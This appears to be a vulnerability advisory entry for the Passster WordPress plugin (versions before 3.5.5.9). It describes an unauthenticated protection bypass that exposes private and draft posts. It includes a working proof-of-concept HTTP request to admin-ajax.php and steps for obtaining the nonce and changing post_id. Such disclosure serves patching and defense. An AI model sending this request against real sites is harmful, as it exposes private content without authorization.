Lucene search

K
wpexploitDc11WPEX-ID:0967303D-EA49-4993-84EB-A7EC97240071
HistoryDec 29, 2022 - 12:00 a.m.

Passster < 3.5.5.9 - Protection Bypass & Arbitrary Post Access

2022-12-2900:00:00
dc11
263
passster protectionbypass arbitrarypostaccess nonceretrieval adminajax exploit

EPSS

0.002

Percentile

62.4%

The plugin does not properly check for password, as well as that the post to be viewed is public, allowing unauthenticated users to bypass the protection offered by the plugin, and access arbitrary posts (such as private) content, by sending a specifically crafted request.

The nonce can be retrieved from a post protected by the plugin (look for ps_ajax). 1260 is the ID of a post protected by the plugin and a password. Arbitrary posts (such as private/draft) can also be accessed the same way, just by changing the post_id parameter)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

action=validate_input&nonce=a14db14dbd&captcha=a&post_id=1260&type=captcha&protection=full

EPSS

0.002

Percentile

62.4%

Related for WPEX-ID:0967303D-EA49-4993-84EB-A7EC97240071